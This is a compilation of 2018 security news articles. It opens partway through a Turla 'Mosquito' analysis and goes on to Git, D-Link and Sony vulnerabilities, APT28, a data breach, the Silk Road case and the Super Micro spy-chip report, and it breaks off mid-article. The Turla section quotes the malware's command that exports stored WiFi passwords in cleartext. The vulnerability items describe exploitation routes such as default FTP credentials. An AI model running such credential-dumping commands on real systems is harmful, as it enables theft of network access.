The “DllForUserFileLessInstaller” injector module maintained a compilation date of November 22, 2017, and was starting to be used by Mosquito to inject ComRAT modules into memory around January 2018. It is a small piece of metasploit injector code that accounts for issues with Wow64. Also, related open source powershell registry loader code oddly was modified to avoid AES use, and opt for 3DES encryption instead. Here is the modified Mosquito code:

And here is the default Posh-SecMod code that they ripped from:

We expect to see more open-source based or inspired fileless components and memory loaders from Mosquito throughout 2018. Perhaps this malware enhancement indicates that they are more interested in maintaining current access to victim organizations than developing offensive technologies.

MiTM and Ducking the Mosquito Net
We delivered actionable data on Mosquito to our private intel customers in early 2017. Our initial findings included data around an unusual and legitimate download URL for trojanized installers:

hxxp://admdownload.adobe[.]com/bin/live/flashplayer23ax_ra_install.exe

While we could not identify the MiTM techniques with accuracy at the time, it is possible either WiFi MiTM or router compromise was used in relation to these incidents. It is unlikely, but possible, that ISP-level FinFisher MiTM was used, considering multiple remote locations across the globe were targeted.

But there is more incident data that should be elaborated on. In some cases, two “.js” files were written to disk and the infected system configured to run them at startup. Their naming provides insight into the intention of this functionality, which is to keep the malware remotely updated via google application, and maintain local settings updates by loading and running “1.txt” at every startup. In a way, this staged script loading technique seems to be shared with the IcedCoffee javascript loading techniques observed in past Turla incidents focused on European government organizations. Updates are provided from the server-side, leading to fewer malware set findings.

google_update_checker.js
local_update_checker.js
So, we should consider the wifi data collection that Mosquito Turla performed during these updates, as it hasn’t been documented publicly. One of the first steps that several Mosquito installer packages performed after writing and running this local_update js file was to export all local host’s WiFi profiles (settings and passwords) to %APPDATA%\<profile>.xml with a command line call:

cmd.exe /c netsh wlan export profile key=clear folder="%APPDATA%"

They then gather more network information with a call to ipconfig and arp -a. Maintaining ongoing host-based collection of wifi credentials for target networks makes it far easier to possess ongoing access to wifi networks for spoofing and MiTM, as brute-forcing or otherwise cracking weakly secured WiFi networks becomes unnecessary. Perhaps this particular method of location-dependent intrusion and access is on the decline for Mosquito Turla, as we haven’t identified new URLs delivering trojanized code.

The Next Strike
It’s very interesting to see ongoing targeting overlap, or the lack of overlap, with other APT activity. Noting that Turla was absent from the milestone DNC hack event where Sofacy and CozyDuke were both present, but Turla was quietly active around the globe on other projects, provides some insight as to ongoing motivations and ambitions of this group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on.

Both Turla’s Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets. While WhiteAtlas and WhiteBear activity stretched across the globe to include foreign affairs related organizations, not all targeting consistently followed this profile. Scientific and technical centers were also targeted, and organizations outside of the political arena came under focus as well. Turla’s KopiLuwak activity does not necessarily focus on diplomatic/foreign affairs, and also winds down a different path. Instead, 2018 activity targeted government related scientific and energy research organizations, and a government related communications organization in Afghanistan. This highly selective but wider targeting set most likely will continue into 2019.
From the targeting perspective, we see closer ties between the KopiLuwak and WhiteBear activity, and closer alignments between Mosquito and Carbon activity.

And WhiteBear and KopiLuwak shared infrastructure while deploying unusual .js scripting. Perhaps open source offensive malware will become much more present in Mosquito and Carbon attacks as we see more meterpreter and injector code, and more uniquely innovative complex malware will continue to be distributed with KopiLuwak and a possible return of WhiteBear. And as we see with borrowed techniques from the previous zebrocy spearphishing, techniques are sometimes passed around and duplicated.


The Git Project addresses a critical arbitrary code execution vulnerability in Git
8.10.2018 securityaffairs
Vulnerebility

The Git Project released a new version of the Git client, Github Desktop, or Atom. that addressed a critical remote code execution vulnerability in the Git.
The Git Project addressed a critical remote code execution vulnerability in the Git command line client, Git Desktop, and Atom.

The flaw tracked as CVE-2018-17456 could be exploited by malicious repositories to remotely execute commands on a vulnerable system.

A malicious repository can create a .gitmodules file that contains an URL that starts with a dash.

The usage of a dash when Git clones a repository using the –recurse-submodules argument, will trigger the command to interpret the URL as an option, making possible for an attacker to perform remote code execution on the computer.

“When running “git clone –recurse-submodules”, Git parses the supplied .gitmodules file for a URL field and blindly passes it as an argument to a “git clone” subprocess. If the URL field is set to a string that begins with a dash, this “git clone” subprocess interprets the URL as an option. This can lead to executing an arbitrary script shipped in the superproject as the user who ran “git clone”.”

“In addition to fixing the security issue for the user running “clone”, the 2.17.2, 2.18.1 and 2.19.1 releases have an “fsck” check which can be used to detect such malicious repository content when fetching or accepting a push. See “transfer.fsckObjects” in git-config(1).”

This flaw has been addressed in Git v2.19.1, GitHub Desktop 1.4.2, Github Desktop 1.4.3-beta0, Atom 1.31.2, and Atom 1.32.0-beta3.

Users have to upgrade their installs to the latest version of the Git client, Github Desktop, or Atom.


D-Link fixed several flaws in Central WiFiManager access point management tool
8.10.2018 securityaffairs
Vulnerebility

D-Link addresses several remote code execution and XSS vulnerabilities affecting the Central WiFiManager access point management tool.
D-Link issued security patches to address several remote code execution and cross-site scripting (XSS) vulnerabilities affecting the Central WiFiManager access point management tool.

The vulnerabilities have been reported by researchers at SecureAuth/CoreSecurity

D-Link Central WiFiManager software controller helps network administrators streamline their wireless access point (AP) management workflow. It leverages a centralized server to remotely allow the management and the monitoring of wireless APs on a network.

The software can be deployed both locally and in the cloud.

The researchers discovered four potentially serious flaws in Central WiFiManager for Windows (version 1.03 and others) that can be exploited for arbitrary code execution.

The most severe flaw, tracked as CVE-2018-17440, is related to the presence of default credentials (admin/admin) in the FTP server running on port 9000 of the web app.

An attacker can use it to credentials to connect the server and upload a specially crafted PHP file that once requested will lead to arbitrary code execution.

“The web application starts an FTP server running on the port 9000 by default with admin/admin credentials and do not show the option to change it, so in this POC we establish a connection with the server and upload a PHP file. Since the application do not restrict unauthenticated users to request any file in the web root, we later request the uploaded file to achieve remote code execution.” reads the security advisory.

Central WiFiManager access point management tool

Another flaw discovered by researchers tracked as CVE-2018-17442 is an authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type.

The Central WiFiManager access point management tool allows users to upload RAR archives and an authenticated attacker could exploit this feature by uploading an archive that includes a PHP file whose content will be executed in the context of the web application.

“When the .rar is uploaded is stored in the path ‘\web\captivalportal’ in a folder with a timestamp created by the PHP time() function. In order to know what is the web server’s time we request an information file that contains the time we are looking for. After we have the server’s time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one,” continues the advisory.

The remaining issued include two stored XSS flaws in the “UpdateSite” (CVE-2018-17443) and “addUser” (CVE-2018-17441) functionality, specifically the sitename and usernameparameters, respectively.

The vulnerabilities were reported to D-Link in on June 4, and the company addressed them with the version 1.03R0100-Beta1.


APT28 group return to covert intelligence gathering ops in Europe and South America.
8.10.2018 securityaffairs
APT

Experts from Symantec collected evidence that APT28 group returns to covert intelligence gathering operations in Europe and South America.
APT28 state-sponsored group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) seems to have shifted the focus for its operations away from election interference to cyber espionage activities.

The APT28 group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

According to experts from Symantec, the group is now actively conducting cyber espionage campaigns against government and military organizations in Europe and South America.

Starting in 2017 and continuing into 2018, the APT28 group returned to covert intelligence gathering operations in Europe and South America.

“After receiving an unprecedented amount of attention in 2016, APT28 has continued to mount operations during 2017 and 2018. However, the group’s activities since the beginning of 2017 have again become more covert and appear to be mainly motivated by intelligence gathering.” reads the analysis published by Symantec.

“The organizations targeted by APT28 during 2017 and 2018 include:

A well-known international organization
Military targets in Europe
Governments in Europe
A government of a South American country
An embassy belonging to an Eastern European country”
APT28 back espionage

The cyberespionage group used several malware and hacking tools from its arsenal, including the Sofacy backdoor, the in composed of two main components; the Trojan.Sofacy (aka Seduploader) used for basic reconnaissance and the Backdoor.SofacyX (aka X-Agent) which was used as a second stage info-stealing malware.

The APT group is also using the recently discovered Lojax UEFI rootkit that allows the attackers to maintain persistence on the infected machine even if the operating system is reinstalled and the hard drive is replaced.

Symantec researchers also highlighted possible links to other espionage operations, including the Earworm that has been active since at least May 2016 and is involved intelligence-gathering operations against military targets in Europe, Central Asia, and Eastern Asia.

The Earworm group carried out spear-phishing campaigns aimed at delivering the Trojan.Zekapab downloader and the Backdoor.Zekapab.

Experts noticed some overlap with the command and control infrastructures used by Earworm and APT28.

“During 2016, Symantec observed some overlap between the command and control (C&C) infrastructure used by Earworm and the C&C infrastructure used by Grizzly Steppe (the U.S. government code name for APT28 and related actors), implying a potential connection between Earworm and APT28. However, Earworm also appears to conduct separate operations from APT28 and thus Symantec tracks them as a distinct group.” continues the report.

The information gathered by Symantec demonstrates that APT28 is still very active and continues to change Techniques, Tactics, and Procedures (TTPs) to remain under the radar.


Sony Bravia Smart TVs affected by a critical vulnerability
7.10.2018 securityaffairs
Vulnerebility

Experts at FortiGuard Labs team discovered three vulnerabilities in eight Sony Bravia smart TVs, one of them rated as critical.
Patch management is a crucial aspect for IoT devices, smart objects are surrounding us and represent a privileged target for hackers.

Experts at FortiGuard Labs team discovered three vulnerabilities (a stack buffer overflow, a directory traversal, and a command-injection issue) in eight Sony Bravia smart TVs, one of them rated as critical.

Affected Sony Bravia models include R5C, WD75, WD65, XE70, XF70, WE75, WE6 and WF6.

The most severe vulnerability tracked as CVE-2018-16593 is a command-injection flaw that resides in the Sony application Photo Sharing Plus that allows users to share multimedia content from their mobile devices via Sony Smart TVs.

An attacker needs to share on the same wireless network as the Sony TV in order to trigger the vulnerability.

“This application handles file names incorrectly when the user uploads a media file. An attacker can abuse such filename mishandling to run arbitrary commands on the system, which can result in complete remote code execution with root privilege.” reads the blog post published by Fortinet.
“Fortinet previously released IPS signature Sony.SmartTV.Remote.Code.Execution for this specific vulnerability to proactively protect our customers.”

Sony bravia

Remaining bugs also affect the Sony’s Photo Sharing Plus application running on Sony Bravia. The stack buffer overflow (CVE-2018-16595) is a “memory corruption vulnerability that is tied to the lack of sanitization of user input.

“This is a memory corruption vulnerability that results from insufficient size checking of user input. With a long enough HTTP POST request sent to the corresponding URL, the application will crash.” continues the advisory.
Fortinet previously released IPS signature Sony.SmartTV.Stack.Buffer.Overflow for this specific vulnerability to proactively protect our customers.”

The third flaw directory-traversal vulnerability tracked as CVE-2018-16594 that relates to the way the Photo Sharing Plus app handles file names.

“The application handles file names incorrectly when receiving a user’s input file via uploading a URL. A attacker can upload an arbitrary file with a crafted file name (e.g.: ../../) that can then traverse the whole filesystem.” reads the blog post.
“Fortinet previously released IPS signature Sony.SmartTV.Directory.Traversal for this specific vulnerability to proactively protect our customers.”

Sony has provided over-the-air patch updated to address the flaws, the fixes need to be approved by the user.

“If your television is set to automatically receive updates when connected to the internet, it should have already been updated. This is the default setting for the affected models.” reads the security advisory published by Sony.

“To verify that your television has been updated, please visit the Downloads section of your model’s product page. Click the Firmware update link for details about how to check the software version. If your television has not already been updated, please follow the instructions to download and install the update.”


Sales intel firm Apollo data breach exposed more than 200 million contact records
7.10.2018 securityaffairs
Incindent

The sales intelligence firm Apollo is the last victim of a massive data breach that exposed more than 200 million contact records.
Apollo collects a lot of its information from public sources, including names, email addresses, and company contact information, it also gathers data by scraping Twitter and LinkedIn.

The company already notified the security breach to its customers last week, the incident occurred on 23 Jul 2018.

“On discovery, we took immediate steps to remediate our systems and confirmed the issue could not lead to any future unauthorized access,” co-founder and CEO Tim Zheng wrote.

“We can appreciate that this situation may cause you concern and frustration.”

The company, formerly known as ZenProspect, allows salespeople to connect with potential buyers using its database of 200 million contacts at 10 million companies.

Affected customers received a data breach notification email, below a copy obtained by TechCrunch.

The data breach notification said the breach was discovered weeks after system upgrades in July.

“We have confirmed that the majority of exposed information came from our publicly gathered prospect database, which could include name, email address, company names, and other business contact information,” reads the data breach notification email sent to the customers.

“Some client-imported data was also accessed without authorization,”

Exposed data includes email addresses, employers, geographic locations, job titles, names, phone numbers, salutations, social media profiles.

The good news is that exposed data doesn’t include Social Security numbers, financial data or email addresses and passwords.

Apollo data breach

Apollo chief executive Tim Zheng confirmed the investigation is still ongoing, but he did not say if the company has informed state authorities of the security breach.

Apollo co-founder and CTO Ray Li told WIRED that the company is investigating the breach and has reported it to law enforcement.

Experts warn that the company may face sanctions under the European GDPR.

Even if no sensitive data has been exposed, such kind of incident expose users to the risk of fraud, spam, or other even harmful actions.

Troy Hunt has already included the record in its data breach tracking service HaveIBeenPwned.

“It’s just a staggering amount of data. There were 125,929,660 unique email addresses in total. This will probably be the most email notifications HaveIBeenPwned has ever sent for one breach,” Hunt explained. “Clearly this is all about ‘data enrichment,’ creating comprehensive profiles of individuals that can then be used for commercial purposes. As such, the more data an organization like Apollo can collect, the more valuable their service becomes.”


Silk Road admin pleaded guilty to drug trafficking charges and faces up to 20 years in prison
7.10.2018 securityaffairs
Crime

Gary Davis, one of the admins and moderators of the notorious Silk Road black marketplace, pleaded guilty to drug trafficking charges.
Gary Davis is an Irish national (20) who was one of the admins and moderators of the notorious Silk Road black marketplace, on Friday he pleaded guilty to drug trafficking charges.

“Geoffrey S. Berman, the United States Attorney for the Southern District of New York, announced that GARY DAVIS, a/k/a “Libertas,” pled guilty today to conspiring to distribute massive quantities of narcotics, a charge arising out of his role as a member of the small administrative staff of “Silk Road.” ” reads the DoJ press release.

“Manhattan U.S. Attorney Geoffrey S. Berman said: “Silk Road was a secret online marketplace for illegal drugs, hacking services, and a whole host of other criminal activity. As he admitted today, Gary Davis served as an administrator who helped run the Silk Road marketplace. Davis’s arrest, extradition from Ireland, and conviction should send a clear message: the purported anonymity of the dark web is not a protective shield from prosecution.”

Silk Road

The man, who is also known as Libertas, could face a maximum sentence of 20 years in prison. Davis also provided customer support to Silk Road users in 2013, for this job he received a weekly salary.

“From May 2013 up to June 2013, DAVIS served as a forum moderator for Silk Road. From June 2013 up to October 2, 2013, DAVIS worked as a site administrator on Silk Road. ” continues the press release.

“In his role as a site administrator, DAVIS’s responsibilities included (1) responding to customer support requests from Silk Road users who needed assistance with their buyer or seller accounts on the marketplace; (2) serving as an arbitrator by resolving disputes that arose between drug dealers and buyers on the site; and (3) enforcing the rules for doing business on Silk Road, which had been set by Ulbricht. “

Silk Road was seized by law enforcement in 2013 and his founder Ross William Ulbricht (aka Dread Pirate Roberts) was arrested, later it was sentenced to life in prison after being convicted on multiple counts related to the Silk Road activity.

According to FBI, between February of 2011 and July 2013, Silk Road managed $1.2 billion worth of transactions for 957,079 users, the total earning for Ulbricht was nearly $80 million.

According to the DoJ press release, more than $200 million worth of illegal drugs and other contraband were sold through the black market.

The FBI also seized about $33.6 million worth of Bitcoin that were sold by authorities in a series of auctions.

In November 2013, after the seizure of the original Silk Road, a new version of the popular black market was launched, so-called Silk Road 2.0, and Libertas was one of the administrators, but it is not clear is the pseudonymous was still used by Davis at the time.

Davis was identified and arrested in Ireland in January 2014, he made opposition to the extradition in the U.S. due to his mental health and fearing for his life. He was arguing that the extradition and consequent incarceration in the U.S. were violating his fundamental rights.

Davis was extradited to the United States in July 2014, he is expected to be sentenced on 17 January 2019 by Judge Furman.
“DAVIS, 30, of Wicklow, Ireland, pled guilty to one count of conspiracy to distribute narcotics, which carries a maximum sentence of 20 years in prison.” concludes the DoJ. “The maximum potential sentence in this case is prescribed by Congress and is provided here for informational purposes only, as any sentencing of the defendant will be determined by the judge. DAVIS is scheduled to be sentenced by Judge Furman on January 17, 2019 at 3:30 p.m.”


Windows 10 October 2018 Update could cause CCleaner stop working
7.10.2018 securityaffairs
Security

Users are reporting problems with the CCleaner software that appears to be partially broken after the installation of Windows 10 October 2018 Update
Many Windows users are reporting problems after the installation of Windows 10 October 2018 Update, a few days ago a Reddit user discovered the Task Manager tool was showing inaccurate CPU usage after the upgrade.

Other users discovered that some files on their machines were deleted after the Windows 10 October 2018 Update was installed.

Now users are reporting problems with the CCleaner software that appears to be partially broken after the installation of Windows 10 October 2018 Update (version 1809).

ccleaner

Some users claim that the certain features have stopped working after upgrading their Operating System. Some users reported that CCleaner failed to clean recent files and documents in File Explorer.

According to the member crizal of the official Piriform forum, CCleaner 5.47.6716 no longer cleans the following:

Recent files/documents in File Explorer
Reliability History
Windows Event Logs (CCleaner shows they’re cleaned but they’re still there)
Registry Cleaner keeps finding the same Application Paths Issue after every reboot (System32\DriverStore\FileRepository)
CCleaner must force close Edge browser prior to every cleaning, even if the browser has been closed (not that big a deal to me)
Piriform plan to fix the issue very soon.

“Thank you for reporting. We are aiming to fix this for the next release. Keep your eyes on the Beta Releases forum as we may publish it there first to get the fix out more quickly,” said a forum moderator.


China Tech Stocks Lenovo, ZTE Tumble After Chip Hack Report
7.10.2018 securityweek
BigBrothers

HONG KONG (AP) — Chinese tech stocks Lenovo Group and ZTE Corp. tumbled in Hong Kong on Friday following a news report Chinese spies might have used chips supplied by another company to hack into U.S. computer systems.

Lenovo shares closed down 15.1 percent while ZTE lost 11 percent.

Bloomberg News cited unidentified U.S. officials as saying malicious chips were inserted into equipment supplied by Super Micro Computer Inc. to American companies and government agencies.

Lenovo, with headquarters in Beijing and Research Triangle Park, North Carolina, is the biggest global manufacturer of personal computers and has a growing smartphone brand.

"Super Micro is not a supplier to Lenovo in any capacity," said Lenovo in a statement. "Furthermore, as a global company we take extensive steps to protect the ongoing integrity of our supply chain."

A spokeswoman for ZTE, headquartered in Shenzhen in southern China, said she wasn't aware of the report.

The Chinese foreign ministry didn't respond to a request for comment.

Bloomberg said Chinese military operatives added components to Super Micro products made at factories in China. It said the components included code that caused the products to accept changes to their software and to connect to outside computers.

Super Micro, headquartered in San Jose, California, denied its products contained malicious chips.

"Supermicro has never found any malicious chips, nor been informed by any customer that such chips have been found," said a company statement.

Chinese tech companies face heightened scrutiny in the United States.

A 2012 report by a congressional panel said ZTE and Chinese rival Huawei Technology Ltd. were security risks and warned American telecoms companies not to buy their equipment.

ZTE faced possible bankruptcy this year after Washington imposed a seven-year ban on sales of U.S. technology to the company over its exports to Iran and North Korea. American authorities lifted the ban in July after ZTE paid a $1 billion fine, agreed to replace its executive team and hired U.S.-selected compliance officers.


West Accuses Russian Spy Agency of Scores of Attacks

7.10.2018 securityweek BigBrothers

LONDON (AP) — The West unleashed an onslaught of new evidence and indictments Thursday accusing Russian military spies of hacking so widespread that it seemed to target anyone, anywhere who investigates Moscow's involvement in an array of criminal activities — including doping, poisoning and the downing of a plane.

Russia defiantly denied the charges, neither humbled nor embarrassed by the exceptional revelations on one of the most high-tension days in East-West relations in years. Moscow lashed back with allegations that the Pentagon runs a clandestine U.S. biological weapons program involving toxic mosquitoes, ticks and more.

The nucleus of Thursday's drama was Russia's military intelligence agency known as the GRU, increasingly the embodiment of Russian meddling abroad.

In the last 24 hours: U.S. authorities charged seven officers from the GRU with hacking international agencies; British and Australian authorities accused the GRU of a devastating 2017 cyberattack on Ukraine, the email leaks that rocked the U.S. 2016 election and other damaging hacks; And Dutch officials alleged that GRU agents tried and failed to hack into the world's chemical weapons watchdog, the Organization for the Prohibition of Chemical Weapons.

The ham-handed attempted break-in — involving hacking equipment in the trunk of a car and a trail of physical and virtual clues — was the most stunning operation revealed Thursday. It was so obvious, in fact, that it almost looked like the Russians didn't care about getting caught.

"Basically, the Russians got caught with their equipment, people who were doing it, and they have got to pay the piper. They are going to have to be held to account," U.S. Defense Secretary James Mattis said in Brussels, where he was meeting with NATO allies.

Mattis said the West has "a wide variety of responses" available.

Britain's ambassador to the Netherlands, Peter Wilson, said the GRU would no longer be allowed to act with impunity.

Calling Russia a "pariah state," British Defense Secretary Gavin Williamson said: "Where Russia acts in an indiscriminate and reckless way, where they have done in terms of these cyberattacks, we will be exposing them."

Deputy Foreign Minister Sergei Ryabkov of Russia said in a statement that the U.S. is taking a "dangerous path" by "deliberately inciting tensions in relations between the nuclear powers," adding that Washington's European allies should also think about it.

While the accusations expose how much damage Russia can do in foreign lands, through remote hacking and on-site infiltration — they also expose how little Western countries can do to stop it.

Russia is already under EU and U.S. sanctions, and dozens of GRU agents and alleged Russian trolls have already been indicted by the U.S but will likely never be handed over to face American justice.

Still, to the Western public, Thursday may have been a pivotal day, with accusations so extensive, and the chorus of condemnation so loud, that it left little doubt of massive Russian wrongdoing. A wealth of surveillance footage released by Western intelligence agencies was quickly and overwhelmingly confirmed by independent reporting.

The litany of accusations of GRU malfeasance began overnight, when British and Australian authorities accused the Russian agency of being behind the catastrophic 2017 cyberattack in Ukraine. The malicious software outbreak knocked out ATMs, gas stations, pharmacies and hospitals and, according to a secret White House assessment recently cited by Wired, caused $10 billion in damage worldwide.

The British and Australians also linked the GRU to other hacks, including the Democratic Party email leaks and online cyber propaganda that sowed havoc before Americans voted in the 2016 presidential election.

Later Thursday, Dutch defense officials released photos and a timeline of GRU agents' botched attempt to break into the chemical weapons watchdog using Wi-Fi hacking equipment hidden in a car parked outside a nearby Marriott Hotel. The OPCW was investigating a nerve agent attack on a former GRU spy, Sergei Skripal, and his daughter in Salisbury, England, that Britain has blamed on the Russian government. Moscow vehemently denies involvement.

Photographs released by the Dutch Ministry of Defense showed a trunk loaded with a computer, battery, a bulky white transformer and a hidden antenna; officials said the equipment was operational when Dutch counterintelligence interrupted the operation.

What Dutch authorities found seemed to be the work of an amateur. A taxi receipt in the pocket of one of the agents showed he had hired a cab to take him from a street next to GRU headquarters to Moscow's Sheremetyevo Airport. A laptop found with the team appeared to tie them to other alleged GRU hacks.

The men were expelled instead of arrested, because they were traveling on diplomatic passports.

The Dutch also accused the GRU of trying to hack investigators examining the 2014 downing of a Malaysian Airlines jetliner over eastern Ukraine that killed all 298 people on board. A Dutch-led team says it has strong evidence the missile that brought the plane down came from a Russia-based military unit. Russia has denied the charge.

Later Thursday, the U.S. Justice Department charged seven GRU officers — including the four caught in The Hague — in an international hacking rampage that targeted more than 250 athletes, a Pennsylvania-based nuclear energy company, a Swiss chemical laboratory and the OPCW.

The indictment said the GRU targets had publicly supported a ban on Russian athletes in international sports competitions and because they had condemned what they called a state-sponsored doping program by Russia.

U.S. prosecutors said the Russians also targeted a Pennsylvania-based nuclear energy company and the OPCW.

The seven were identified as: Aleksei Morenets, 41; Evgenii Serebriakov, 37; Ivan Yermakov, 32; Artem Malyshev, 30; and Dmitriy Badin, 27; who were each assigned to Military Unit 26165, and Oleg Sotnikov, 46, and Alexey Minin, 46, who were also GRU officers.

The U.S. indictment says the hacking was often conducted remotely. If that wasn't successful, the hackers would conduct "on-site" or "close access" hacking operations, with trained GRU members traveling with sophisticated equipment to target their victims through Wi-Fi networks.

The World Anti-Doping Agency, the U.S. Anti-Doping Agency and the Canadian anti-doping agency were all identified by the U.S. indictment against the Russians.

WADA said the alleged hackers "sought to violate athletes' rights by exposing personal and private data — often then modifying them — and ultimately undermine the work of WADA and its partners in the protection of clean sport."

Travis Tygart, the CEO of the U.S. anti-doping agency and a prominent critic of Russian athletes' drug use, says "a system that was abusing its own athletes with an institutionalized doping program has now been indicted for perpetrating cyberattacks on innocent athletes from around the world."

Russia denied everything.

Konstantin Kosachev, the head of the foreign affairs committee in the upper house of Russian parliament, said the accusations were fake and intended to "delegitimize" a resurgent Russia. The West has picked up the GRU as "a modern analogue of the KGB which served as a bugaboo for people in the West during the Cold War," he said.

Russia countered with accusations of their own: The Defense Ministry unveiled complex allegations that the U.S. has a clandestine biological weapons lab in the country of Georgia as part of a network of labs on the edges of Russia and China that flout international rules.

Pentagon spokesman Eric Pahon called the accusations "an invention" and "obvious attempts to divert attention from Russia's bad behavior on many fronts."

The Associated Press, meanwhile, independently corroborated information that matches details for two of the alleged Russian agents named by the Dutch authorities.

An online car registration database in Russia showed that Aleksei Morenets, whose full name and date of birth are the same as one of the expelled Russians, sold his car in 2004, listing the Moscow address where the Defense Ministry's Military University is based.

Alexey Minin, another Russian whose full name and date of birth match the Dutch details, had several cars, including an Alfa Romeo, that were registered and sold at the address where the Defense Ministry's GRU school is located. In some of the filings, Minin listed the official military unit number of the GRU school as his home address.


New Splunk IoT Solution Helps Secure ICS
7.10.2018 securityweek
ICS

Splunk this week unveiled a new solution designed to help industrial organizations protect control systems, monitor and diagnose equipment, and predict downtimes.

Splunk for Industrial IoT, expected to become available on October 30, combines the capabilities of Splunk Enterprise, Splunk Industrial Asset Intelligence, and the Splunk Machine Learning Toolkit.

Splunk says the new solution can help organizations in the energy, utilities, transportation, oil and gas, and manufacturing sectors monitor, optimize and secure their industrial systems.

Using the capabilities of Splunk Enterprise, Splunk for Industrial IoT should help organizations secure their industrial control systems (ICS) from cyber threats through advanced analytics and actionable intelligence, while ensuring that services are not disrupted, the company says.

Splunk for Industrial IoT allows organizations to search, correlate and visualize different types of data in real time to obtain all the information needed to assess their security posture, conduct investigations, and respond to incidents.

Security is only one of the components of the industrial IoT product. Splunk says organizations can also use it to monitor and diagnose industrial assets such as turbines, pumps, and compressors. Customers can monitor the uptime and availability of supervisory control and data acquisition (SCADA) systems, distributed control systems (DCS) and process control software.

In addition, Splunk says the new product can be used to identify early warning signs of an ICS downtime using prediction, anomaly detection and clustering algorithms.

“Industrial organizations are challenged daily to reduce costs, increase performance and secure their constantly expanding footprint of ‘connected’ devices to remain competitive in their industry,” said Dr. Ulrich Bock, Director of Data Analytics at ESE, a German industrial engineering firm. “Our partnership with Splunk is critical to the success of these customers, blending our knowledge of operational technology environments with Splunk’s powerful ability to make machine data accessible and usable to all. Splunk for Industrial IoT now makes it easy to harness and transform the massively growing volume of machine data into insights and energy to power and accelerate their digital transformation initiatives.”


D-Link Patches Code Execution, XSS Flaws in Management Tool
7.10.2018 securityweek
Vulnerebility

D-Link has released patches for several remote code execution and cross-site scripting (XSS) vulnerabilities found by researchers in the company's Central WiFiManager access point management tool.

Central WiFiManager allows organizations to create and manage multi-site and multi-tenancy wireless networks. The software can be deployed both locally and in the cloud.

Researchers at SecureAuth + CoreSecurity discovered that version 1.03 – and possibly others – of Central WiFiManager for Windows is affected by four potentially serious vulnerabilities that can be exploited for arbitrary code execution.

The most severe of the security holes, CVE-2018-17440, is related to the fact that the web app includes an FTP server running on port 9000 with the default credentials admin/admin. An attacker can use it to establish a connection to the server and upload a specially crafted PHP file. Requesting this file can lead to arbitrary code execution.

Another code execution vulnerability discovered by researchers is CVE-2018-17442, which also involves uploading arbitrary files. The tool allows users to upload RAR archives and experts noticed that they can abuse the functionality to upload archives that include a PHP file whose content will be executed in the context of the web application. However, SecureAuth + CoreSecurity noted in its advisory that authentication is required for exploitation.

"When the .rar is uploaded is stored in the path '\web\captivalportal' in a folder with a timestamp created by the PHP time() function. In order to know what is the web server's time we request an information file that contains the time we are looking for. After we have the server's time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one," the security firm said in its advisory.

Experts also discovered two stored XSS flaws in the "UpdateSite" (CVE-2018-17443) and "addUser" (CVE-2018-17441) functionality, specifically the sitename and username parameters, respectively.

The vulnerabilities were reported to D-Link in early June and they were patched recently with the release of version 1.03R0100-Beta1.

"This disclosure directly affects the software package and current installations should be update with the new released available to download below. Failure to update may put this software package, the host computer it runs on, and D-Link devices that it manages at risk," D-Link said in its own advisory.


Industry Reactions to Chinese Spy Chips: Feedback Friday
7.10.2018 securityweek
BigBrothers

Bloomberg reported this week that the Chinese government planted tiny chips in Super Micro servers to spy on Amazon, Apple and tens of other important organizations in the United States.

The spy chips allegedly made it into devices made by California-based Super Micro after Chinese agents masquerading as government or Super Micro employees pressured or bribed managers at the Chinese factories where the motherboards are built.

Once the chips were planted, they would reportedly allow attackers to remotely access the compromised devices. According to Bloomberg, the operation was conducted by the Chinese military and it targeted over 30 organizations, including government agencies and tech giants. Amazon, Apple and Super Micro have all denied the allegations.

Experts comment on reports that China used tiny chips to spy on US tech giants

Industry professionals contacted by SecurityWeek have commented on various aspects of the story, including the technical details, political impact, and how organizations can defend themselves against such attacks.

And the feedback begins...

Ian Pratt, co-founder and president, Bromium:

"From the publicly available information it sounds like the implant was intended to compromise the Baseboard Management Controller (BMC) that is present on most server hardware to allow remote management over a network. The BMC has a lot of control over the system. It can provide remote keyboard/video/mouse access to the system over the network. It also typically has access to lots of information about the host, such as its name, domain, IP addresses etc, and can query other information from the host via SNMP. The BMC can also be used to upgrade or modify the firmware used by the main CPU and Management Engine (ME), providing a great scope for stealthy malfeasance.

Based on the photographs, the device appears to be an SPI bus interposer, which would be inserted into the SPI bus between the BMC and the flash memory chip it boots from. A serial interface like SPI is very convenient for this purpose as it requires few pins (6), and hence a small and unobtrusive chip can be used. The implant likely contains a small firmware image that is served up to the BMC when it boots, in preference to the real firmware. Once that special image is running on the BMC, it likely puts the implant into pass-through mode and then loads the real firmware, but the special implanted code will stay resident within the BMC, controlling its actions.

It is likely that the implant would have had very limited functionality built directly into it. It would rely on communicating over the internet to a command and control server where it would report information about the machine it was resident on (such as the domain and network), and then receive instructions. I would expect/guess that out of the box it could have enabled the remote video/keyboard to the attacker, and would have been able to download additional code modules that it could store in BMC flash and use for other kinds of exploitation.

This communication with the C&C server is vulnerable to observation, and is quite likely how the implant was discovered -- rather more probable than someone spotting the tiny extra chip.”

Jack Jones, Co-Founder and Chief Risk Scientist, RiskLens:

“We all know that the Chinese have been persistent in their campaigns to steal intellectual property and government intelligence through digital infiltration. We’ve also always known that hardware backdoors are a potential vector for this activity. In fact, many information security professionals have been warning of this for years. Why then, have companies and government agencies continued to purchase vast amounts and varieties of technologies from China?

If we put ourselves in the shoes of a business executive or agency head the answer is fairly obvious — cost savings. They have limited resources with which to achieve their objectives. Yes, their security team may have whispered (or shouted) in their ear of the dangers, but our profession has long suffered from a Chicken Little image. After a while, the myriad “high risks” all start to become an abstract blur in an executive’s mind — as opposed to the clarity of, for example, a 10% lower price with a Chinese product. What decision-makers haven’t had is a way to appropriately weigh these cost saving decisions against the risk implications.

Obviously, while the jury is still out (in some people’s minds) about the veracity and effect of this latest Chinese incursion, it should still serve as a wake-up call. We have to do a much better job of defining, evaluating and communicating loss event scenario probabilities and impacts so that decision-makers can make better-informed decisions. It shouldn’t take a digital "bullet to the knee" before exposures like this are taken seriously.”

Brian Vecci, Technical Evangelist, Varonis:

